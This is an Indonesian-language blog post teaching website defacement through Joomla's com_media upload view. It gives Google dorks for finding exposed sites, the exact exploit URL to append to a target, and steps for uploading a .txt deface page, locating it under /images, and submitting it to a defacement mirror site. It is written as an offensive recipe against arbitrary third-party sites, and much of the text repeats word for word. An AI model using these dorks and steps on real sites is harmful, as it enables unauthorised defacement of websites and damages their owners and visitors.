Hallo bre,
Kali ini gua bakal share cara deface tehnik com_media. Tehnik ini tehnik upload file yang cuma bisa upload file ext .txt, tapi tenang aja bisa di mirror di defacer.id kok :)
Langsung sadja ga pake lama, capek ngetiknya :v
Pertama-tama siapin dulu bahannya :
1. Dork :
- inurl:index.php?option=com_media ( kembangin lagi )
- inurl:com_media intitle:insert image intext:maximum ( dork hasil kembangan gua tanpa exploit :v )
2. Exploit :
- index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
3. Script deface ext .txt
Nah tuh bahan-bahan nya diatas, pahamin dulu dorknya jangan asal paste ke google :v
Langsung sadja ke tutorialnya
• Pertama lu dorking dulu pake dork diatas ( seterah mau pilih yang mana ). Copy tuh dork ke search engine google
• Nanti kan bakal ada banyak web / target yang muncul, pilih salah satu dan masukkan exploit di belakang sitenya
Contoh : http://target.co.li/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
• Kalo webnya vuln bakal ada tempat untuk upload filenya seperti ini
Kali ini gua bakal share cara deface tehnik com_media. Tehnik ini tehnik upload file yang cuma bisa upload file ext .txt, tapi tenang aja bisa di mirror di defacer.id kok :)
Langsung sadja ga pake lama, capek ngetiknya :v
Pertama-tama siapin dulu bahannya :
1. Dork :
- inurl:index.php?option=com_media ( kembangin lagi )
- inurl:com_media intitle:insert image intext:maximum ( dork hasil kembangan gua tanpa exploit :v )
2. Exploit :
- index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
3. Script deface ext .txt
Nah tuh bahan-bahan nya diatas, pahamin dulu dorknya jangan asal paste ke google :v
Langsung sadja ke tutorialnya
• Pertama lu dorking dulu pake dork diatas ( seterah mau pilih yang mana ). Copy tuh dork ke search engine google
• Nanti kan bakal ada banyak web / target yang muncul, pilih salah satu dan masukkan exploit di belakang sitenya
Contoh : http://target.co.li/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
• Kalo webnya vuln bakal ada tempat untuk upload filenya seperti ini
Kalo tampilannya ga seperti itu cari web lain :)
• Upload script deface kalian yang .txt, dan kalo sukses bakalan kayak gini
Kalo ada bacaan failed berarti gagal :v
• kalo udh terupload kaya gitu tinggal dipanggil aja sc nya, caranya ? Tambahin /images/namafile.txt
Contoh : http://target.co.li/images/sc.txt
• Nanti akan seperti ini jadinya :)
• Tinggal di mirrorin dah di defacer.id :)
Sekian tutorial dari gua, semoga bermanfaat :)
Sampe bertemu di tutorial selanjutnya :)
Comments
Post a Comment